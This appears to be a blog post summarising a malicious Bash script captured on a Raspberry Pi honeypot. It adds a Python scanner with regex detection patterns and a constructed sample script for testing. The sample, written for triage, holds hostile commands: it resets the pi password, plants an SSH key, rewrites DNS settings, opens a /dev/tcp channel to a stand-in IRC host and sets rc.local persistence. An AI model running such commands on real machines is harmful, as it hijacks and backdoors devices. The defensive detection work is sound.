I published the following diary on isc.sans.org: “Malicious Network Traffic From /bin/bash”:
One of our readers from Germany sent me a malicious shell script captured by our honeypot running on his Raspberry. It’s a simple UNIX Bash script that performs a bunch of malicious tasks:
- Kills existing crypto miner processes (classic action these days)
- Changes the password of the user ‘pi’ and adds an SSH key
- Changes the DNS resolver configuration and adds some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
- Creates an IRC bot
- Installs extra tools like zmap and sshpass
- Installs itself in /etc/rc.local for persistence
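The behaviours listed above are exactly the kind of thing a defender can triage statically before a captured script is ever run. The following Python scanner is an added example, not the script from the diary: it flags each listed behaviour by heuristic regexes (the patterns are my assumptions about how such actions usually look in shell) and is run against a constructed sample with placeholder values, not the honeypot capture.

```python
import re
from typing import Dict, List

# Heuristic patterns for the behaviours described in the diary. The regexes
# are assumptions about typical shell idioms, not signatures from the capture.
BEHAVIOURS: Dict[str, List[str]] = {
    "kills_miner_processes": [r"\b(pkill|killall)\b.*miner"],
    "changes_pi_password": [r"\bchpasswd\b", r"\bpasswd\b.*\bpi\b"],
    "adds_ssh_key": [r"authorized_keys"],
    "changes_dns_resolver": [r"/etc/resolv\.conf"],
    "hosts_blackhole": [r"127\.0\.0\.1.*>>?\s*/etc/hosts"],
    "irc_bot": [r"\b(NICK|PRIVMSG|JOIN)\b", r"/dev/tcp/\S+/6667"],
    "installs_scan_tools": [r"\b(apt-get|apt|yum|pip)\b.*\b(zmap|sshpass)\b"],
    "rc_local_persistence": [r"/etc/rc\.local"],
}

COMPILED = {name: [re.compile(p) for p in pats] for name, pats in BEHAVIOURS.items()}


def triage_script(text: str) -> Dict[str, List[int]]:
    """Return {behaviour: [1-based line numbers]} for every matching line.

    Blank and comment-only lines are skipped so a benign script that merely
    mentions these paths in comments is not flagged on its comments alone.
    """
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, regexes in COMPILED.items():
            if any(r.search(line) for r in regexes):
                hits.setdefault(name, []).append(lineno)
    return hits


# Constructed sample mimicking the listed behaviours; placeholders stand in
# for the real password, key and hostnames, which are not reproduced here.
SAMPLE = """#!/bin/bash
pkill -9 -f miner
echo "pi:PASSWORD_PLACEHOLDER" | chpasswd
echo "ssh-rsa KEY_PLACEHOLDER" >> /home/pi/.ssh/authorized_keys
echo "nameserver 192.0.2.53" > /etc/resolv.conf
echo "127.0.0.1 update.example.invalid" >> /etc/hosts
exec 3<>/dev/tcp/irc.example.invalid/6667; echo "NICK bot" >&3
apt-get install -y zmap sshpass
grep -q /opt/x.sh /etc/rc.local || sed -i '$ i /opt/x.sh &' /etc/rc.local
"""

if __name__ == "__main__":
    for behaviour, lines in triage_script(SAMPLE).items():
        print(f"{behaviour}: lines {lines}")
```

On a real Raspberry Pi the same checks belong in a host audit: diff /etc/hosts, /etc/resolv.conf, /etc/rc.local and the pi user's authorized_keys against known-good copies rather than trusting the script to tell you what it did.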